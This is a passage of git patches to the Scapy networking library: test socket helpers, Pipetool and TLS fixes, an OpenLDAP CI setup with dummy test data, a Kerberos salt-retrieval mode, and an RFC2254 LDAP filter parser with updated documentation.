a/test/testsocket.py b/test/testsocket.py index 9709a99a350..d1a90a4da51 100644 --- a/test/testsocket.py +++ b/test/testsocket.py @@ -9,7 +9,6 @@ import time import random -from socket import socket from threading import Lock from scapy.config import conf @@ -25,10 +24,14 @@ Tuple, Any, List, - cast, ) from scapy.supersocket import SuperSocket +from scapy.plist import ( + PacketList, + SndRcvList, +) + open_test_sockets = list() # type: List[TestSocket] @@ -59,6 +62,25 @@ def __exit__(self, exc_type, exc_value, traceback): """Close the socket""" self.close() + def sr(self, *args, **kargs): + # type: (Any, Any) -> Tuple[SndRcvList, PacketList] + """Send and Receive multiple packets + """ + from scapy import sendrecv + return sendrecv.sndrcv(self, *args, threaded=False, **kargs) + + def sr1(self, *args, **kargs): + # type: (Any, Any) -> Optional[Packet] + """Send one packet and receive one answer + """ + from scapy import sendrecv + ans = sendrecv.sndrcv(self, *args, threaded=False, **kargs)[0] # type: SndRcvList + if len(ans) > 0: + pkt = ans[0][1] # type: Packet + return pkt + else: + return None + def close(self): # type: () -> None global open_test_sockets From bf8652b8b92899fdcfb420f0f44015aff1c6f15f Mon Sep 17 00:00:00 2001 From: phil777 Date: Tue, 24 Sep 2024 22:28:15 +0200 Subject: [PATCH 1369/1632] 2 small fixes related to Pipetools (#4532) * Fix: make sure ObjectPipe does not overwrite sensible defaut name by Pipe class * Fix: fds are non-inheritable by default since Python 3.4. It broke TermSink --- scapy/pipetool.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/scapy/pipetool.py b/scapy/pipetool.py index 0034b66fc68..a28b3534f1e 100644 --- a/scapy/pipetool.py +++ b/scapy/pipetool.py @@ -357,8 +357,8 @@ def stop(self): class Source(Pipe, ObjectPipe[Any]): def __init__(self, name=None): # type: (Optional[str]) -> None - Pipe.__init__(self, name=name) ObjectPipe.__init__(self, name) + Pipe.__init__(self, name=name) self.is_exhausted = False def _read_message(self): @@ -716,6 +716,7 @@ def _start_unix(self): if not self.opened: self.opened = True rdesc, self.wdesc = os.pipe() + os.set_inheritable(rdesc, True) cmd = ["xterm"] if self.name is not None: cmd.extend(["-title", self.name]) From a07e5d5ece0459e34ea09abb32c59c5140f618ef Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 24 Sep 2024 23:06:27 +0200 Subject: [PATCH 1370/1632] Fix crash with StreamSocket and TLS (#4535) Co-authored-by: Guillaume Valadon Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/layers/tls/session.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/scapy/layers/tls/session.py b/scapy/layers/tls/session.py index f7b219a6835..3ac56789e91 100644 --- a/scapy/layers/tls/session.py +++ b/scapy/layers/tls/session.py @@ -1167,6 +1167,8 @@ def tcp_reassemble(cls, data, metadata, session): length = struct.unpack("!H", data[3:5])[0] + 5 if len(data) >= length: # get the underlayer as it is used to populate tls_session + if "original" not in metadata: + return cls(data) underlayer = metadata["original"][TCP].copy() underlayer.remove_payload() # eventually get the tls_session now for TLS.dispatch_hook From f7a64114b35fd8ee63ce07290f8a2dffd52b215f Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 28 Sep 2024 15:11:32 +0200 Subject: [PATCH 1371/1632] LDAP - test against openLDAP, minor win-proto fixes (#4539) * DCE/RPC: fix any() for conformant fields * Kerberos: fix crealm in Authenticator * Kerberos: add GET_SALT mode * LDAP: improve client, support for search() * Greatly improve SMB2 ACL support * Test our LDAP client against OpenLDAP * Update LDAP doc * TLS client test: also close client_socket --- .config/ci/install.sh | 10 +- .config/ci/openldap-testdata.ldif | 146 +++++ doc/scapy/layers/ldap.rst | 32 +- scapy/layers/dcerpc.py | 5 +- scapy/layers/kerberos.py | 80 ++- scapy/layers/ldap.py | 625 ++++++++++++++++++++-- scapy/layers/smb2.py | 451 +++++++++++++--- test/scapy/layers/kerberos.uts | 4 +- test/scapy/layers/ldap.uts | 3 +- test/scapy/layers/ldapopenldap.uts | 32 ++ test/scapy/layers/smb2.uts | 2 +- test/scapy/layers/tls/tlsclientserver.uts | 10 +- 12 files changed, 1254 insertions(+), 146 deletions(-) create mode 100644 .config/ci/openldap-testdata.ldif create mode 100644 test/scapy/layers/ldapopenldap.uts diff --git a/.config/ci/install.sh b/.config/ci/install.sh index bd21565896b..716e6892309 100755 --- a/.config/ci/install.sh +++ b/.config/ci/install.sh @@ -27,7 +27,9 @@ then fi fi -# Install wireshark data, ifconfig, vcan, samba +CUR=$( cd "$(dirname "${BASH_SOURCE[0]}")" ; pwd -P ) + +# Install wireshark data, ifconfig, vcan, samba, openldap if [ "$OSTYPE" = "linux-gnu" ] then sudo apt-get update @@ -35,6 +37,12 @@ then sudo apt-get -qy install can-utils || exit 1 sudo apt-get -qy install linux-modules-extra-$(uname -r) || exit 1 sudo apt-get -qy install samba smbclient + # For OpenLDAP, we need to pre-populate some setup questions + sudo debconf-set-selections <<< 'slapd slapd/password2 password Bonjour1' + sudo debconf-set-selections <<< 'slapd slapd/password1 password Bonjour1' + sudo debconf-set-selections <<< 'slapd slapd/domain string scapy.net' + sudo apt-get -qy install slapd + ldapadd -D "cn=admin,dc=scapy,dc=net" -w Bonjour1 -f $CUR/openldap-testdata.ldif -c # Make sure libpcap is installed if [ ! -z $SCAPY_USE_LIBPCAP ] then diff --git a/.config/ci/openldap-testdata.ldif b/.config/ci/openldap-testdata.ldif new file mode 100644 index 00000000000..56a429afef2 --- /dev/null +++ b/.config/ci/openldap-testdata.ldif @@ -0,0 +1,146 @@ +# SPDX-License-Identifier: OLDAP-2.8 +# This file is https://git.openldap.org/openldap/openldap/-/blob/master/tests/data/ppolicy.ldif?ref_type=heads +# (renamed to dc=scapy, dc=net) + +dn: dc=scapy, dc=net +objectClass: top +objectClass: organization +objectClass: dcObject +o: Scapy +dc: scapy + +dn: ou=People, dc=scapy, dc=net +objectClass: top +objectClass: organizationalUnit +ou: People + +dn: ou=Groups, dc=scapy, dc=net +objectClass: organizationalUnit +ou: Groups + +dn: cn=Policy Group, ou=Groups, dc=scapy, dc=net +objectClass: groupOfNames +cn: Policy Group +member: uid=nd, ou=People, dc=scapy, dc=net +owner: uid=ndadmin, ou=People, dc=scapy, dc=net + +dn: cn=Test Group, ou=Groups, dc=scapy, dc=net +objectClass: groupOfNames +cn: Policy Group +member: uid=another, ou=People, dc=scapy, dc=net + +dn: ou=Policies, dc=scapy, dc=net +objectClass: top +objectClass: organizationalUnit +ou: Policies + +dn: cn=Standard Policy, ou=Policies, dc=scapy, dc=net +objectClass: top +objectClass: device +objectClass: pwdPolicy +cn: Standard Policy +pwdAttribute: 2.5.4.35 +pwdLockoutDuration: 15 +pwdInHistory: 6 +pwdCheckQuality: 2 +pwdExpireWarning: 10 +pwdMaxAge: 30 +pwdMinLength: 5 +pwdMaxLength: 13 +pwdGraceAuthnLimit: 3 +pwdAllowUserChange: TRUE +pwdMustChange: TRUE +pwdMaxFailure: 3 +pwdFailureCountInterval: 120 +pwdSafeModify: TRUE +pwdLockout: TRUE + +dn: cn=Idle Expiration Policy, ou=Policies, dc=scapy, dc=net +objectClass: top +objectClass: device +objectClass: pwdPolicy +cn: Idle Expiration Policy +pwdAttribute: 2.5.4.35 +pwdLockoutDuration: 15 +pwdInHistory: 6 +pwdCheckQuality: 2 +pwdExpireWarning: 10 +pwdMaxIdle: 15 +pwdMinLength: 5 +pwdMaxLength: 13 +pwdGraceAuthnLimit: 3 +pwdAllowUserChange: TRUE +pwdMustChange: TRUE +pwdMaxFailure: 3 +pwdFailureCountInterval: 120 +pwdSafeModify: TRUE +pwdLockout: TRUE + +dn: cn=Stricter Policy, ou=Policies, dc=scapy, dc=net +objectClass: top +objectClass: device +objectClass: pwdPolicy +cn: Stricter Policy +pwdAttribute: 2.5.4.35 +pwdLockoutDuration: 15 +pwdInHistory: 6 +pwdCheckQuality: 2 +pwdExpireWarning: 10 +pwdMaxAge: 15 +pwdMinLength: 5 +pwdMaxLength: 13 +pwdAllowUserChange: TRUE +pwdMustChange: TRUE +pwdMaxFailure: 3 +pwdFailureCountInterval: 120 +pwdSafeModify: TRUE +pwdLockout: TRUE + +dn: cn=Another Policy, ou=Policies, dc=scapy, dc=net +objectClass: top +objectClass: device +objectClass: pwdPolicy +cn: Test Policy +pwdAttribute: 2.5.4.35 + +dn: uid=nd, ou=People, dc=scapy, dc=net +objectClass: top +objectClass: person +objectClass: inetOrgPerson +cn: Neil Dunbar +uid: nd +sn: Dunbar +givenName: Neil +userPassword: testpassword + +dn: uid=ndadmin, ou=People, dc=scapy, dc=net +objectClass: top +objectClass: person +objectClass: inetOrgPerson +cn: Neil Dunbar (Admin) +uid: ndadmin +sn: Dunbar +givenName: Neil +userPassword: testpw + +dn: uid=test, ou=People, dc=scapy, dc=net +objectClass: top +objectClass: person +objectClass: inetOrgPerson +cn: test test +uid: test +sn: Test +givenName: Test +userPassword: kfhgkjhfdgkfd +pwdPolicySubEntry: cn=No Policy, ou=Policies, dc=scapy, dc=net + +dn: uid=another, ou=People, dc=scapy, dc=net +objectClass: top +objectClass: person +objectClass: inetOrgPerson +cn: Another Test +uid: another +sn: Test +givenName: Another +userPassword: testing + diff --git a/doc/scapy/layers/ldap.rst b/doc/scapy/layers/ldap.rst index 6a14102f049..73de23432a5 100644 --- a/doc/scapy/layers/ldap.rst +++ b/doc/scapy/layers/ldap.rst @@ -4,9 +4,8 @@ LDAP Scapy fully implements the LDAPv2 / LDAPv3 messages, in addition to a very basic :class:`~scapy.layers.ldap.LDAP_Client` class. .. warning:: - *The String Representation of LDAP Search Filters* (RFC2254) is currently **unsupported**. - This means that you can't use the commonly known LDAP search syntax, and instead have to use the binary format. - PRs are welcome ! + Scapy's LDAP client is currently read-only. PRs are welcome ! + LDAP client usage ----------------- @@ -16,6 +15,7 @@ The general idea when using the :class:`~scapy.layers.ldap.LDAP_Client` class co - instantiating the class - calling :func:`~scapy.layers.ldap.LDAP_Client.connect` with the IP (this is where to specify whether to use SSL or not) - calling :func:`~scapy.layers.ldap.LDAP_Client.bind` (this is where to specify a SSP if authentication is desired) +- calling :func:`~scapy.layers.ldap.LDAP_Client.search` to search data. The simplest, unauthenticated demo of the client would be something like: @@ -172,9 +172,28 @@ Once the LDAP connection is bound, it becomes possible to perform requests. For client.sr1(LDAP_SearchRequest()).show() -Querying more complicated requests is a bit tedious, as it *currently* requires you to build the Search request yourself. +We can also use the :func:`~scapy.layers.ldap.LDAP_Client.search` passing a base DN, a filter (as specified by RFC2254) and a scope.\\ + +The scope can be one of the following: + +- 0=baseObject: only the base DN's attributes are queried +- 1=singleLevel: the base DN's children are queried +- 2=wholeSubtree: the entire subtree under the base DN is included + For instance, this corresponds to querying the DN ``CN=Users,DC=domain,DC=local`` with the filter ``(objectCategory=person)`` and asking for the attributes ``objectClass,name,description,canonicalName``: +.. code:: python + + resp = client.search( + "CN=Users,DC=domain,DC=local", + "(objectCategory=person)", + ["objectClass", "name", "description", "canonicalName"], + scope=1, # children + ) + resp.show() + +To understand exactly what's going on, note that the previous call is exactly identical to the following: + .. code:: python resp = client.sr1( @@ -199,4 +218,7 @@ For instance, this corresponds to querying the DN ``CN=Users,DC=domain,DC=local` attrsOnly=ASN1_BOOLEAN(0) ) ) - resp.show() + + +.. warning:: + Our RFC2254 parser currently does not support 'Extensible Match'. diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index bd3b12c030e..346de69bab2 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -1686,9 +1686,6 @@ def i2h(self, pkt, x): def h2i(self, pkt, x): return x - # def i2count(self, pkt, x): - # return 1 - def i2len(self, pkt, x): if x is None: return 0 @@ -2156,7 +2153,7 @@ def i2len(self, pkt, x): def any2i(self, pkt, x): # User-friendly helper if self.conformant_in_struct: - return x + return super(_NDRConfField, self).any2i(pkt, x) if self.CONFORMANT_STRING and not isinstance(x, NDRConformantString): return NDRConformantString( value=super(_NDRConfField, self).any2i(pkt, x), diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 205c5c362f0..4b816c8c3b4 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -2261,8 +2261,7 @@ class KRB_GSS_Wrap(Packet): lambda pkt: pkt.Flags.Sealed, ) ], - XStrLenField("Data", b"", - length_from=lambda pkt: pkt.EC), + XStrLenField("Data", b"", length_from=lambda pkt: pkt.EC), ), ] @@ -2514,6 +2513,7 @@ class KerberosClient(Automaton): class MODE(IntEnum): AS_REQ = 0 TGS_REQ = 1 + GET_SALT = 2 def __init__( self, @@ -2544,7 +2544,7 @@ def __init__( if not spn: raise ValueError("Invalid spn") if realm is None: - if mode == self.MODE.AS_REQ: + if mode in [self.MODE.AS_REQ, self.MODE.GET_SALT]: _, realm = _parse_upn(upn) elif mode == self.MODE.TGS_REQ: _, realm = _parse_spn(spn) @@ -2555,7 +2555,7 @@ def __init__( else: raise ValueError("Invalid realm") - if mode == self.MODE.AS_REQ: + if mode in [self.MODE.AS_REQ, self.MODE.GET_SALT]: if not host: raise ValueError("Invalid host") elif mode == self.MODE.TGS_REQ: @@ -2574,7 +2574,17 @@ def __init__( debug=kwargs.get("debug", 0), ).ip - if etypes is None: + if mode == self.MODE.GET_SALT: + if etypes is not None: + raise ValueError("Cannot specify etypes in GET_SALT mode !") + + from scapy.libs.rfc3961 import EncryptionType + + etypes = [ + EncryptionType.AES256_CTS_HMAC_SHA1_96, + EncryptionType.AES128_CTS_HMAC_SHA1_96, + ] + elif etypes is None: from scapy.libs.rfc3961 import EncryptionType etypes = [ @@ -2594,7 +2604,7 @@ def __init__( self._port = port sock = self._connect() - if self.mode == self.MODE.AS_REQ: + if self.mode in [self.MODE.AS_REQ, self.MODE.GET_SALT]: self.host = host.upper() self.password = password and bytes_encode(password) self.spn = spn @@ -2792,7 +2802,7 @@ def BEGIN(self): @ATMT.condition(BEGIN) def should_send_as_req(self): - if self.mode == self.MODE.AS_REQ: + if self.mode in [self.MODE.AS_REQ, self.MODE.GET_SALT]: raise self.SENT_AP_REQ() @ATMT.condition(BEGIN) @@ -2842,12 +2852,35 @@ def _process_padatas_and_key(self, padatas): salt, ) - @ATMT.receive_condition(SENT_AP_REQ) + @ATMT.receive_condition(SENT_AP_REQ, prio=0) + def receive_salt_mode(self, pkt): + # This is only for "Salt-Mode", a mode where we get the salt then + # exit. + if self.mode == self.MODE.GET_SALT: + if Kerberos not in pkt: + raise self.FINAL() + if not isinstance(pkt.root, KRB_ERROR): + log_runtime.error("Pre-auth is likely disabled !") + raise self.FINAL() + if pkt.root.errorCode == 25: # KDC_ERR_PREAUTH_REQUIRED + for padata in pkt.root.eData.seq: + if padata.padataType == 0x13: # PA-ETYPE-INFO2 + elt = padata.padataValue.seq[0] + if elt.etype.val in self.etypes: + self.result = elt.salt.val + raise self.FINAL() + else: + log_runtime.error("Failed to retrieve the salt !") + raise self.FINAL() + + @ATMT.receive_condition(SENT_AP_REQ, prio=1) def receive_krb_error_as_req(self, pkt): + # We check for a PREAUTH_REQUIRED error. This means that preauth is required + # and we need to do a second exchange. if Kerberos in pkt and isinstance(pkt.root, KRB_ERROR): if pkt.root.errorCode == 25: # KDC_ERR_PREAUTH_REQUIRED if not self.key and (not self.upn or not self.password): - log_runtime.warning( + log_runtime.error( "Got 'KDC_ERR_PREAUTH_REQUIRED', " "but no key, nor upn+pass was passed." ) @@ -2857,11 +2890,11 @@ def receive_krb_error_as_req(self, pkt): self.pre_auth = True raise self.BEGIN() else: - log_runtime.warning("Received KRB_ERROR") + log_runtime.error("Received KRB_ERROR") pkt.show() raise self.FINAL() - @ATMT.receive_condition(SENT_AP_REQ) + @ATMT.receive_condition(SENT_AP_REQ, prio=2) def receive_as_rep(self, pkt): if Kerberos in pkt and isinstance(pkt.root, KRB_AS_REP): raise self.FINAL().action_parameters(pkt) @@ -2874,7 +2907,7 @@ def retry_after_eof_in_apreq(self): self.update_sock(self._connect()) raise self.BEGIN() else: - log_runtime.warning("Socket was closed in an unexpected state") + log_runtime.error("Socket was closed in an unexpected state") raise self.FINAL() @ATMT.action(receive_as_rep) @@ -3077,6 +3110,26 @@ def krb_as_and_tgs(upn, spn, ip=None, key=None, password=None, **kwargs): ) +def krb_get_salt(upn, ip=None, realm=None, host="WIN10", **kwargs): + """ + Kerberos AS-Req only to get the salt associated with the UPN. + """ + if realm is None: + _, realm = _parse_upn(upn) + cli = KerberosClient( + mode=KerberosClient.MODE.GET_SALT, + realm=realm, + ip=ip, + spn="krbtgt/" + realm, + upn=upn, + host=host, + **kwargs, + ) + cli.run() + cli.stop() + return cli.result + + def kpasswd( upn, targetupn=None, @@ -3854,10 +3907,11 @@ def GSS_Init_sec_context( os.urandom(16), ) Context.SendSeqNum = RandNum(0, 0x7FFFFFFF)._fix() + _, crealm = _parse_upn(self.UPN) ap_req.authenticator.encrypt( Context.STSessionKey, KRB_Authenticator( - crealm=self.ST.realm, + crealm=crealm, cname=PrincipalName.fromUPN(self.UPN), # RFC 4121 checksum cksum=Checksum( diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index 26db10ce838..fb29c5493d5 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -19,8 +19,10 @@ """ import collections -import ssl +import re import socket +import ssl +import string import struct import uuid @@ -29,20 +31,25 @@ from scapy.arch import get_if_addr from scapy.ansmachine import AnsweringMachine from scapy.asn1.asn1 import ( - ASN1_STRING, + ASN1_BOOLEAN, ASN1_Class, ASN1_Codecs, + ASN1_ENUMERATED, + ASN1_INTEGER, + ASN1_STRING, ) from scapy.asn1.ber import ( - BERcodec_STRING, + BER_Decoding_Error, BER_id_dec, BER_len_dec, + BERcodec_STRING, ) from scapy.asn1fields import ( ASN1F_badsequence, ASN1F_BOOLEAN, ASN1F_CHOICE, ASN1F_ENUMERATED, + ASN1F_FLAGS, ASN1F_INTEGER, ASN1F_NULL, ASN1F_optional, @@ -50,8 +57,8 @@ ASN1F_SEQUENCE_OF, ASN1F_SEQUENCE, ASN1F_SET_OF, - ASN1F_STRING, ASN1F_STRING_PacketField, + ASN1F_STRING, ) from scapy.asn1packet import ASN1_Packet from scapy.config import conf @@ -90,6 +97,10 @@ NETLOGON_SAM_LOGON_RESPONSE_EX, ) +# Typing imports +from typing import ( + List, +) # Elements of protocol # https://datatracker.ietf.org/doc/html/rfc1777#section-4 @@ -403,17 +414,17 @@ class LDAP_UnbindRequest(ASN1_Packet): class LDAP_SubstringFilterInitial(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = LDAPString("initial", "") + ASN1_root = LDAPString("val", "") class LDAP_SubstringFilterAny(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = LDAPString("any", "") + ASN1_root = LDAPString("val", "") class LDAP_SubstringFilterFinal(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = LDAPString("final", "") + ASN1_root = LDAPString("val", "") class LDAP_SubstringFilterStr(ASN1_Packet): @@ -452,12 +463,19 @@ class LDAP_SubstringFilter(ASN1_Packet): class LDAP_FilterAnd(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SET_OF("and_", [], _LDAP_Filter) + ASN1_root = ASN1F_SET_OF("vals", [], _LDAP_Filter) class LDAP_FilterOr(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SET_OF("or_", [], _LDAP_Filter) + ASN1_root = ASN1F_SET_OF("vals", [], _LDAP_Filter) + + +class LDAP_FilterNot(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_PACKET("val", None, None, next_cls_cb=lambda *args, **kwargs: LDAP_Filter) + ) class LDAP_FilterPresent(ASN1_Packet): @@ -475,19 +493,28 @@ class LDAP_FilterGreaterOrEqual(ASN1_Packet): ASN1_root = AttributeValueAssertion.ASN1_root -class LDAP_FilterLesserOrEqual(ASN1_Packet): +class LDAP_FilterLessOrEqual(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = AttributeValueAssertion.ASN1_root -class LDAP_FilterLessOrEqual(ASN1_Packet): +class LDAP_FilterApproxMatch(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = AttributeValueAssertion.ASN1_root -class LDAP_FilterApproxMatch(ASN1_Packet): +class LDAP_FilterExtensibleMatch(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = AttributeValueAssertion.ASN1_root + ASN1_root = ASN1F_SEQUENCE( + ASN1F_optional( + LDAPString("matchingRule", "", implicit_tag=0x81), + ), + ASN1F_optional( + LDAPString("type", "", implicit_tag=0x81), + ), + AttributeValue("matchValue", "", implicit_tag=0x82), + ASN1F_BOOLEAN("dnAttributes", False, implicit_tag=0x84), + ) class ASN1_Class_LDAP_Filter(ASN1_Class): @@ -502,6 +529,7 @@ class ASN1_Class_LDAP_Filter(ASN1_Class): LessOrEqual = 0xA6 Present = 0x87 # not constructed ApproxMatch = 0xA8 + ExtensibleMatch = 0xA9 class LDAP_Filter(ASN1_Packet): @@ -516,7 +544,7 @@ class LDAP_Filter(ASN1_Packet): "or_", None, LDAP_FilterOr, implicit_tag=ASN1_Class_LDAP_Filter.Or ), ASN1F_PACKET( - "not_", None, _LDAP_Filter, implicit_tag=ASN1_Class_LDAP_Filter.Not + "not_", None, LDAP_FilterNot, implicit_tag=ASN1_Class_LDAP_Filter.Not ), ASN1F_PACKET( "equalityMatch", @@ -554,8 +582,151 @@ class LDAP_Filter(ASN1_Packet): LDAP_FilterApproxMatch, implicit_tag=ASN1_Class_LDAP_Filter.ApproxMatch, ), + ASN1F_PACKET( + "extensibleMatch", + None, + LDAP_FilterExtensibleMatch, + implicit_tag=ASN1_Class_LDAP_Filter.ExtensibleMatch, + ), ) + @staticmethod + def from_rfc2254_string(filter: str): + """ + Convert a RFC-2254 filter to LDAP_Filter + """ + # Note: this code is very dumb to be readable. + _lerr = "Invalid LDAP filter string: " + if filter.lstrip()[0] != "(": + filter = "(%s)" % filter + + # 1. Cheap lexer. + tokens = [] + cur = tokens + backtrack = [] + filterlen = len(filter) + i = 0 + while i < filterlen: + c = filter[i] + i += 1 + if c in [" ", "\t", "\n"]: + # skip spaces + continue + elif c == "(": + # enclosure + cur.append([]) + backtrack.append(cur) + cur = cur[-1] + elif c == ")": + # end of enclosure + if not backtrack: + raise ValueError(_lerr + "parenthesis unmatched.") + cur = backtrack.pop(-1) + elif c in "&|!": + # and / or / not + cur.append(c) + elif c in "=": + # filtertype + if cur[-1] in "~><:": + cur[-1] += c + continue + cur.append(c) + elif c in "~><": + # comparisons + cur.append(c) + elif c == ":": + # extensible + cur.append(c) + elif c == "*": + # substring + cur.append(c) + else: + # value + v = "" + for x in filter[i - 1 :]: + if x in "():!|&~<>=*": + break + v += x + if not v: + raise ValueError(_lerr + "critical failure (impossible).") + i += len(v) - 1 + cur.append(v) + + # Check that parenthesis were closed + if backtrack: + raise ValueError(_lerr + "parenthesis unmatched.") + + # LDAP filters must have an empty enclosure () + tokens = tokens[0] + + # 2. Cheap grammar parser. + # Doing it recursively is trivial. + def _getfld(x): + if not x: + raise ValueError(_lerr + "empty enclosure.") + elif len(x) == 1 and isinstance(x[0], list): + # useless enclosure + return _getfld(x[0]) + elif x[0] in "&|": + # multinary operator + if len(x) < 3: + raise ValueError(_lerr + "bad use of multinary operator.") + return (LDAP_FilterAnd if x[0] == "&" else LDAP_FilterOr)( + vals=[LDAP_Filter(filter=_getfld(y)) for y in x[1:]] + ) + elif x[0] == "!": + # unary operator + if len(x) != 2: + raise ValueError(_lerr + "bad use of unary operator.") + return LDAP_FilterNot( + val=LDAP_Filter(filter=_getfld(x[1])), + ) + elif "=" in x and "*" in x: + # substring + if len(x) < 3 or x[1] != "=": + raise ValueError(_lerr + "bad use of substring.") + return LDAP_SubstringFilter( + type=ASN1_STRING(x[0].strip()), + filters=[ + LDAP_SubstringFilterStr( + str=( + LDAP_SubstringFilterFinal + if i == (len(x) - 3) + else LDAP_SubstringFilterInitial + if i == 0 + else LDAP_SubstringFilterAny + )(val=ASN1_STRING(y)) + ) + for i, y in enumerate(x[2:]) + if y != "*" + ], + ) + elif ":=" in x: + # extensible + raise NotImplementedError("Extensible not implemented.") + elif any(y in ["<=", ">=", "~=", "="] for y in x): + # simple + if len(x) != 3 or "=" not in x[1]: + raise ValueError(_lerr + "bad use of comparison.") + if x[2] == "*": + return LDAP_FilterPresent(present=ASN1_STRING(x[0])) + return ( + LDAP_FilterLessOrEqual + if "<=" in x + else LDAP_FilterGreaterOrEqual + if ">=" in x + else LDAP_FilterApproxMatch + if "~=" in x + else LDAP_FilterEqual + )( + attributeType=ASN1_STRING(x[0].strip()), + attributeValue=ASN1_STRING(x[2]), + ) + else: + raise ValueError(_lerr + "invalid filter.") + + return LDAP_Filter(filter=_getfld(tokens)) + class LDAP_SearchRequestAttribute(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER @@ -630,22 +801,18 @@ class LDAP_AbandonRequest(ASN1_Packet): ) -# LDAP v3 - -# RFC 4511 sect 4.1.11 - - -class LDAP_Control(ASN1_Packet): +class LDAP_SearchResponseReference(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE( - LDAPOID("controlType", ""), - ASN1F_optional( - ASN1F_BOOLEAN("criticality", False), - ), - ASN1F_optional(ASN1F_STRING("controlValue", "")), + ASN1_root = ASN1F_SEQUENCE_OF( + "uris", + [], + URI, + implicit_tag=ASN1_Class_LDAP.SearchResultReference, ) +# LDAP v3 + # RFC 4511 sect 4.12 - Extended Operation @@ -676,6 +843,72 @@ def do_dissect(self, x): return s +# RFC 4511 sect 4.1.11 + +_LDAP_CONTROLS = {} + + +class _ControlValue_Field(ASN1F_STRING_PacketField): + def m2i(self, pkt, s): + val = super(_ControlValue_Field, self).m2i(pkt, s) + if not val[0].val: + return val + controlType = pkt.controlType.val.decode() + if controlType in _LDAP_CONTROLS: + return ( + _LDAP_CONTROLS[controlType](val[0].val, _underlayer=pkt), + val[1], + ) + return val + + +class LDAP_Control(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + LDAPOID("controlType", ""), + ASN1F_optional( + ASN1F_BOOLEAN("criticality", False), + ), + ASN1F_optional(_ControlValue_Field("controlValue", "")), + ) + + +# RFC 2696 - LDAP Control Extension for Simple Paged Results Manipulation + + +class LDAP_realSearchControlValue(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_INTEGER("size", 0), + ASN1F_STRING("cookie", ""), + ) + + +_LDAP_CONTROLS["1.2.840.113556.1.4.319"] = LDAP_realSearchControlValue + + +# [MS-ADTS] + + +class LDAP_serverSDFlagsControl(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_FLAGS( + "flags", + None, + [ + "OWNER", + "GROUP", + "DACL", + "SACL", + ], + ) + ) + + +_LDAP_CONTROLS["1.2.840.113556.1.4.801"] = LDAP_serverSDFlagsControl + + # LDAP main class @@ -692,6 +925,7 @@ class LDAP(ASN1_Packet): LDAP_SearchResponseEntry, LDAP_SearchResponseResultDone, LDAP_AbandonRequest, + LDAP_SearchResponseReference, LDAP_UnbindRequest, LDAP_ExtendedResponse, ), @@ -713,6 +947,27 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): return conf.raw_layer return cls + @classmethod + def tcp_reassemble(cls, data, *args, **kwargs): + if len(data) < 4: + return None + # For LDAP, we would prefer to have the entire LDAP response + # (multiple LDAP concatenated) in one go, to stay consistent with + # what you get when using SASL. + remaining = data + while remaining: + try: + length, x = BER_len_dec(BER_id_dec(remaining)[1]) + except (BER_Decoding_Error, IndexError): + return None + if length and len(x) >= length: + remaining = x[length:] + if not remaining: + return cls(data) + else: + return None + return None + def hashret(self): return b"ldap" @@ -772,6 +1027,132 @@ def answers(self, other): bind_bottom_up(UDP, CLDAP, sport=389) bind_layers(UDP, CLDAP, sport=389, dport=389) +# [MS-ADTS] sect 3.1.1.2.3.3 + +LDAP_PROPERTY_SET = { + uuid.UUID( + "C7407360-20BF-11D0-A768-00AA006E0529" + ): "Domain Password & Lockout Policies", + uuid.UUID("59BA2F42-79A2-11D0-9020-00C04FC2D3CF"): "General Information", + uuid.UUID("4C164200-20C0-11D0-A768-00AA006E0529"): "Account Restrictions", + uuid.UUID("5F202010-79A5-11D0-9020-00C04FC2D4CF"): "Logon Information", + uuid.UUID("BC0AC240-79A9-11D0-9020-00C04FC2D4CF"): "Group Membership", + uuid.UUID("E45795B2-9455-11D1-AEBD-0000F80367C1"): "Phone and Mail Options", + uuid.UUID("77B5B886-944A-11D1-AEBD-0000F80367C1"): "Personal Information", + uuid.UUID("E45795B3-9455-11D1-AEBD-0000F80367C1"): "Web Information", + uuid.UUID("E48D0154-BCF8-11D1-8702-00C04FB96050"): "Public Information", + uuid.UUID("037088F8-0AE1-11D2-B422-00A0C968F939"): "Remote Access Information", + uuid.UUID("B8119FD0-04F6-4762-AB7A-4986C76B3F9A"): "Other Domain Parameters", + uuid.UUID("72E39547-7B18-11D1-ADEF-00C04FD8D5CD"): "DNS Host Name Attributes", + uuid.UUID("FFA6F046-CA4B-4FEB-B40D-04DFEE722543"): "MS-TS-GatewayAccess", + uuid.UUID("91E647DE-D96F-4B70-9557-D63FF4F3CCD8"): "Private Information", + uuid.UUID("5805BC62-BDC9-4428-A5E2-856A0F4C185E"): "Terminal Server License Server", +} + +# [MS-ADTS] sect 5.1.3.2.1 + 